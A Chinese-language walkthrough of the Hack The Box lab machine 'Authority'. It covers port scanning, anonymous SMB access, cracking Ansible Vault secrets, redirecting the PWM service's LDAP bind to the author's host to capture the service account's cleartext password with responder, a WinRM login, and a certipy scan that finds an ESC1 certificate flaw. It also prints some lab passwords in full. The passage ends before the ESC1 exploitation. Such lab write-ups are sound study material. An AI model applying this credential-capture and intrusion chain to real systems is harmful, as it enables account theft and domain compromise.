前言

Windows靶机打得少，坐大牢。

信息收集

nmap

$ sudo nmap -p- --min-rate=10000 10.10.11.222
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-25 02:49 EDT
Warning: 10.10.11.222 giving up on port because retransmission cap hit (10).
Nmap scan report for authority.htb (10.10.11.222)
Host is up (0.078s latency).
Not shown: 65472 closed tcp ports (reset), 34 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
8443/tcp  open  https-alt
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49672/tcp open  unknown
49685/tcp open  unknown
49686/tcp open  unknown
49689/tcp open  unknown
49690/tcp open  unknown
49694/tcp open  unknown
49702/tcp open  unknown
49711/tcp open  unknown
57114/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 14.38 seconds

$ sudo nmap -sT -sV -sC -O -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,8443,9389,47001,49664,49665,49666,49667,49672,49685,49686,49689,49690,49694,49702,4971,57114 10.10.11.222
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-25 03:02 EDT
Nmap scan report for authority.htb (10.10.11.222)
Host is up (0.076s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-07-25 11:03:01Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
|_ssl-date: 2023-07-25T11:04:17+00:00; +4h00m02s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-07-25T11:04:17+00:00; +4h00m02s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
|_ssl-date: 2023-07-25T11:04:17+00:00; +4h00m02s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-07-25T11:04:16+00:00; +4h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8443/tcp  open  ssl/https-alt
| fingerprint-strings:
|   FourOhFourRequest, GetRequest:
|     HTTP/1.1 200
|     Content-Type: text/html;charset=ISO-8859-1
|     Content-Length: 82
|     Date: Tue, 25 Jul 2023 11:03:07 GMT
|     Connection: close
|     <html><head><meta http-equiv="refresh" content="0;URL='/pwm'"/></head></html>
|   HTTPOptions:
|     HTTP/1.1 200
|     Allow: GET, HEAD, POST, OPTIONS
|     Content-Length: 0
|     Date: Tue, 25 Jul 2023 11:03:07 GMT
|     Connection: close
|   RTSPRequest:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1936
|     Date: Tue, 25 Jul 2023 11:03:13 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {fnt-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 40
|_    Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol [RTSP&#47;1.00x0d0x0a0x0d0x0a...]/p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invaid
| ssl-cert: Subject: commonName=172.16.2.118
| Not valid before: 2023-07-23T09:37:08
|_Not valid after:  2025-07-24T21:15:32
|_ssl-date: TLS randomness does not represent time
|_http-title: Site doesn't have a title (text/plain;charset=UTF-8).
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49689/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49711/tcp open  msrpc         Microsoft Windows RPC
57114/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-servie :
SF-Port8443-TCP:V=7.94%T=SSL%I=7%D=7/25%Time=64BF73A9%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,DB,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/html;c
SF:harset=ISO-8859-1\r\nContent-Length:\x2082\r\nDate:\x20Tue,\x2025\x20Ju
SF:l\x202023\x2011:03:07\x20GMT\r\nConnection:\x20close\r\n\r\n\n\n\n\n\n<
SF:html><head><meta\x20http-equiv=\"refresh\"\x20content=\"0;URL='/pwm'\"/
SF:></head></html>")%r(HTTPOptions,7D,"HTTP/1\.1\x20200\x20\r\nAllow:\x20G
SF:ET,\x20HEAD,\x20POST,\x20OPTIONS\r\nContent-Length:\x200\r\nDate:\x20Tu
SF:e,\x2025\x20Jul\x202023\x2011:03:07\x20GMT\r\nConnection:\x20close\r\n\
SF:r\n")%r(FourOhFourRequest,DB,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20
SF:text/html;charset=ISO-8859-1\r\nContent-Length:\x2082\r\nDate:\x20Tue,\
SF:x2025\x20Jul\x202023\x2011:03:07\x20GMT\r\nConnection:\x20close\r\n\r\n
SF:\n\n\n\n\n<html><head><meta\x20http-equiv=\"refresh\"\x20content=\"0;UR
SF:L='/pwm'\"/></head></html>")%r(RTSPRequest,82C,"HTTP/1\.1\x20400\x20\r\
SF:nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:\x20en\r\
SF:nContent-Length:\x201936\r\nDate:\x20Tue,\x2025\x20Jul\x202023\x2011:03
SF::13\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x20la
SF:ng=\"en\"><head><title>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20
SF:Request</title><style\x20type=\"text/css\">body\x20{font-family:Tahoma,
SF:Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;background
SF:-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}\
SF:x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:bla
SF:ck;}\x20\.line\x20{height:1px;background-color:#525D76;border:none;}</s
SF:tyle></head><body><h1>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20R
SF:equest</h1><hr\x20class=\"line\"\x20/><p><b>Type</b>\x20Exception\x20Re
SF:port</p><p><b>Message</b>\x20Invalid\x20character\x20found\x20in\x20the
SF:\x20HTTP\x20protocol\x20\[RTSP&#47;1\.00x0d0x0a0x0d0x0a\.\.\.\]</p><p><
SF:b>Description</b>\x20The\x20server\x20cannot\x20or\x20will\x20not\x20pr
SF:ocess\x20the\x20request\x20due\x20to\x20something\x20that\x20is\x20perc
SF:eived\x20to\x20be\x20a\x20client\x20error\x20\(e\.g\.,\x20malformed\x20
SF:request\x20syntax,\x20invalid\x20");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2019 (96%), Microsoft Windows 10 1709 - 1909 (93%), Microsoft Windows Server 2012 (92%), Microsoft Windows Vista SP1 (92), Microsoft Windows Longhorn (92%), Microsoft Windows 10 1709 - 1803 (91%), Microsoft Windows 10 1809 - 2004 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Wndows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h00m01s, deviation: 0s, median: 4h00m01s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2023-07-25T11:04:06
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.37 seconds

$ sudo nmap --script=vuln 10.10.11.222
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-25 23:17 EDT
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for authority.htb (10.10.11.222)
Host is up (0.075s latency).
Not shown: 987 closed tcp ports (reset)
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
8443/tcp open  https-alt
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-phpmyadmin-dir-traversal:
|   VULNERABLE:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: UNKNOWN (unable to test)
|     IDs:  CVE:CVE-2005-3299
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../etc/passwd :
|
|
|
|
|
|   <html><head><meta http-equiv="refresh" content="0;URL='/pwm'"/></head></html>
|     References:
|       http://www.exploit-db.com/exploits/1244/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
| ssl-dh-params:
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
|             Modulus Type: Safe prime
|             Modulus Source: RFC2409/Oakley Group 2
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)

Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 314.65 seconds

好好好，这么玩是吧，开29个端口是吧，咋不开290个端口。

话是这么说，但是实际上后面RPC调用的端口，都不用看。前面梳理一下，根据经验来说，开了80肯定是要看一下的，139和445的smb共享服务也是要看一下的，还有就是8443有个https-alt的不知道是啥的https服务也是要看一下。其他的暂时不知道有没有用，反正我们先把熟悉的服务一一摸排一遍再说，不行再回看这些服务。

其他扫描

你问我这次为啥没有nikto？也没目录扫描？因为趁nmap扫的时候提前看了一眼80发现是IIS默认页面，没啥好扫的。

服务渗透

smb

既然80是指定不行了，那就该轮到445了，我们先看看smb有没有什么目录是可以无密码访问的。

$ smbclient -L 10.10.11.222
Password for [WORKGROUP\me]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Department Shares Disk
        Development     Disk
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.222 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

我们直接用smbclient -L就能列出共享的目录，但是访问权限这些不清楚，所以我们还是要用smbmap扫一下。

$ smbmap -H 10.10.11.222
[+] IP: 10.10.11.222:445        Name: authority.htb

没结果何意啊，明明smbclient都能扫出来，看了一下上面的结果，猜想可能是要提供一个用户名。

$ smbmap -H 10.10.11.222 -u "test"
[+] Guest session       IP: 10.10.11.222:445    Name: authority.htb
Disk               Permissions     Comment
---------------     -------
ADMIN$              NO ACCESS       Remote Admin
C$                  NO ACCESS       Default share
Department Shares   NO ACCESS
Development         READ ONLY
IPC$                READ ONLY       Remote IPC
NETLOGON            NO ACCESS       Logon server share
SYSVOL              NO ACCESS       Logon server share

果然如此。我们可以发现，Development和IPC$都可以读，那我们就看看Development吧，因为一般IPC$里都不会有什么内容。我们直接无密码登录。

$ smbclient //10.10.11.222/Development
Password for [WORKGROUP\me]:
Try "help" to get a list of possible commands.
smb: \> ls
  .               D        0  Fri Mar 17 09:20:38 2023
  ..              D        0  Fri Mar 17 09:20:38 2023
  Automation      D        0  Fri Mar 17 09:20:40 2023

5888511 blocks of size 4096. 1215595 blocks available
smb: \> cd Automation\
smb: \Automation\> ls
  .               D        0  Fri Mar 17 09:20:40 2023
  ..              D        0  Fri Mar 17 09:20:40 2023
  Ansible         D        0  Fri Mar 17 09:20:50 2023

5888511 blocks of size 4096. 1215595 blocks available
smb: \Automation\> cd Ansible\
smb: \Automation\Ansible\> ls
  .               D        0  Fri Mar 17 09:20:50 2023
  ..              D        0  Fri Mar 17 09:20:50 2023
  ADCS            D        0  Fri Mar 17 09:20:48 2023
  LDAP            D        0  Fri Mar 17 09:20:48 2023
  PWM             D        0  Fri Mar 17 09:20:48 2023
  SHARE           D        0  Fri Mar 17 09:20:48 2023

5888511 blocks of size 4096. 1215595 blocks available

因为不是很熟这些东西的缘故，每个都看了半天，晕晕。

PWM

不知道这些东西都有啥用。先暂时放着，看看8443的https网页是啥。

上来就报了一个提示，说PWM目前处于配置模式，可以不经过LDAP验证就更新配置，然后又给了个登录框。

灵感来了，在PWM之前我们在SMB里面看到过啊，有没有可能里面存有登录凭证啥的？回去翻一翻。

Ansible_vault密文破解

smb: \Automation\Ansible\PWM\defaults\> ls
  .            D        0  Fri Mar 17 09:20:48 2023
  ..           D        0  Fri Mar 17 09:20:48 2023
  main.yml     A     1591  Sun Apr 23 18:51:38 2023

5888511 blocks of size 4096. 1215531 blocks available
smb: \Automation\Ansible\PWM\defaults\> get main.yml
getting file \Automation\Ansible\PWM\defaults\main.yml of size 1591 as main.yml (5.0 KiloBytes/sec) (average 3.8 KiloBytes/sec)

我们在\Automation\Ansible\PWM\defaults\目录下发现了一个main.yml文件，看看内容

---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"

pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true

pwm_require_ssl: false

pwm_admin_login: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          32666534386435366537653136663731633138616264323230383566333966346662313161326239
          6134353663663462373265633832356663356239383039640a346431373431666433343434366139
          35653634376333666234613466396534343030656165396464323564373334616262613439343033
          6334326263326364380a653034313733326639323433626130343834663538326439636232306531
          3438

pwm_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          31356338343963323063373435363261323563393235633365356134616261666433393263373736
          3335616263326464633832376261306131303337653964350a363663623132353136346631396662
          38656432323830393339336231373637303535613636646561653637386634613862316638353530
          3930356637306461350a316466663037303037653761323565343338653934646533663365363035
          6531

ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          63303831303534303266356462373731393561313363313038376166336536666232626461653630
          3437333035366235613437373733316635313530326639330a643034623530623439616136363563
          34646237336164356438383034623462323531316333623135383134656263663266653938333334
          3238343230333633350a646664396565633037333431626163306531336336326665316430613566
          3764

pwm_admin_login,pwm_admin_password,ldap_admin_password这不就是登录凭证嘛。但是这明显是加密后的格式，我们要先解密。先搜一下$ANSIBLE_VAULT是什么加密方式，怎么处理。

我们谷歌一下发现Pentester’s Promiscuous Notebook上有对Ansible的处理方式介绍。

我们按着来。

$ cat ldap.yml
$ANSIBLE_VAULT;1.1;AES256
633038313035343032663564623737313935613133633130383761663365366662326264616536303437333035366235613437373733316635313530326639330a64303462353062343961613636356334646237361643564383830346234623235313163336231353831346562636632666539383333343238343230333633350a6466643965656330373334316261633065313363363266653164306135663764

$ ansible2john ldap.yml
ldap.yml:$ansible$0*0*c08105402f5db77195a13c1087af3e6fb2bdae60473056b5a477731f51502f93*dfd9eec07341bac0e13c62fe1d0a5f7d*d04b50b49aa665c4db73ad5d8804b4b2511c3b15814ebcf2e98334284203635

$ ansible2john ldap.yml > ldap.hash

$ john ldap.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 128/128 AVX 4x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
********         (ldap.yml)
1g 0:00:00:49 DONE (2023-07-25 03:21) 0.02030g/s 807.7p/s 807.7c/s 807.7C/s 001983..woodson
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

一通操作下来把vault的密码给破解出来了，那我们接下来就把获取到的三条密文的内容都解密一下。

cat ldap.yml | $ ansible-vault decrypt
Vault password:
Decryption successful
DevT3st@123

cat username.yml | $ ansible-vault decrypt 
Vault password:
Decryption successful
s******m

$ ansible-vault decrypt ldap.yml
Vault password:
Decryption successful
p**********3

PWM配置文件利用

拿到了登录凭证我们就去PWM登录界面登录一下。

发现并登不上，那就登录一下Configuration Manager，

结合之前打开网页弹出的提示，我们可以不经过LDAP验证而对配置文件进行修改。先把配置文件下载下来，你会发现内容怎么这么多，我们要从哪里下手。这是我们细看一下网页会发现，Health一栏中，LDAP报了一个大大的WARN：

Unable to connect to LDAP server default, error: error connecting to ldap directory (default), error: unable to create connection: unable to connect to any configured ldap url, last error: unable to bind to ldaps://authority.authority.htb:636 as CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb reason: CommunicationException (authority.authority.htb:636; PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target)

这说明与主机的LDAP服务器没连接上，我们甚至还能发现用户名：CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb，那我们在配置文件里面把其LDAP服务的地址改成我们自己的，就能监听到其向LDAP服务器请求验证的账户名和密码了。

直接在配置文件里面搜索ldaps://authority.authority.htb:636，然后改成我们自己的：

<setting key="ldap.serverUrls" modifyTime="2022-08-11T01:46:23Z" profile="default" syntax="STRING_ARRAY" syntaxVersion="0">
            <label>LDAP ⇨ LDAP Directories ⇨ default ⇨ Connection ⇨ LDAP URLs</label>
            <value>ldap://10.10.14.96:389</value>

这里改成389端口的ldap服务而不是636的ldaps的原因是因为LDAP是明文协议，更方便我们获取用户的明文登录凭证。改好之后我们直接import configuration。

ldap监听

然后本地起一个responder监听一下。

$ sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [HTB_VPN_IP]
    Responder IPv6             [HTB_VPN_IPv6]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [*************]
    Responder Domain Name      [********]
    Responder DCE-RPC Port     [48723]

[+] Listening for events...

[LDAP] Cleartext Client   : 10.10.11.222
[LDAP] Cleartext Username : CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb
[LDAP] Cleartext Password : l*****************!
[*] Skipping previously captured cleartext password for CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb
[*] Skipping previously captured cleartext password for CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb

那么我们就拿到了ldap的明文登录凭证。

提权

因为我们已经拿到了ldap的登录凭证，此时可以直接用evil-winrm登录，在desktop上可以拿到user flag。

$ evil-winrm -i 10.10.11.222 -u svc_ldap -p l**************r!

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> dir

    Directory: C:\Users\svc_ldap\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        7/25/2023   8:18 AM             34 user.txt

提权到root

Windows这块提取不太熟，先拿certipy扫一下活动目录证书服务（AD CS）中是否有错误配置项可以利用。

$ certipy find -vulnerable -u svc_ldap@authority.htb -p 'lDaP_1n_th3_cle4r!' -dc-ip 10.10.11.222
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'AUTHORITY-CA'
[-] Got error: module 'enum' has no attribute '_decompose'
[-] Use -debug to print a stacktrace

报错了，说是enum模块没有_decompose属性，查了一下好像python3.11.4之后的版本好像删掉了这块，懒得用conda虚拟环境创了，我们偷个懒，直接在网上找到_decompose源代码加到enum.py里面（不建议学习，最好先做好备份，用后记得还原）。

这样就能用了。

$ certipy find -vulnerable -u svc_ldap@authority.htb -p 'l************r!' -dc-ip 10.10.11.222
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[*] Got CA configuration for 'AUTHORITY-CA'
[*] Saved BloodHound data to '20230725042904_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20230725042904_Certipy.txt'
[*] Saved JSON output to '20230725042904_Certipy.json'

扫描结果在20230725042904_Certipy.txt就能看到。

$ cat 20230725042904_Certipy.txt
Certificate Authorities
  0
    CA Name                             : AUTHORITY-CA
    DNS Name                            : authority.authority.htb
    Certificate Subject                 : CN=AUTHORITY-CA, DC=authority, DC=htb
    Certificate Serial Number           : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
    Certificate Validity Start          : 2023-04-24 01:46:26+00:00
    Certificate Validity End            : 2123-04-24 01:56:25+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : AUTHORITY.HTB\Administrators
      Access Rights
        ManageCa                        : AUTHORITY.HTB\Administrators
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        ManageCertificates              : AUTHORITY.HTB\Administrators
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Enroll                          : AUTHORITY.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : CorpVPN
    Display Name                        : Corp VPN
    Certificate Authorities             : AUTHORITY-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollmentCheckUserDsCertificate
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
                                          Document Signing
                                          IP security IKE intermediate
                                          IP security use
                                          KDC Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 20 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : AUTHORITY.HTB\Domain Computers
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : AUTHORITY.HTB\Administrator
        Write Owner Principals          : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
                                          AUTHORITY.HTB\Administrator
        Write Dacl Principals           : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
                                          AUTHORITY.HTB\Administrator
        Write Property Principals       : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
                                          AUTHORITY.HTB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

我们发现存在ESC1漏洞。直接搜一下如何利用。这篇文章有介绍。照葫芦画瓢。

先按照上面提供的信息请求一下带有管理员权限的证书。

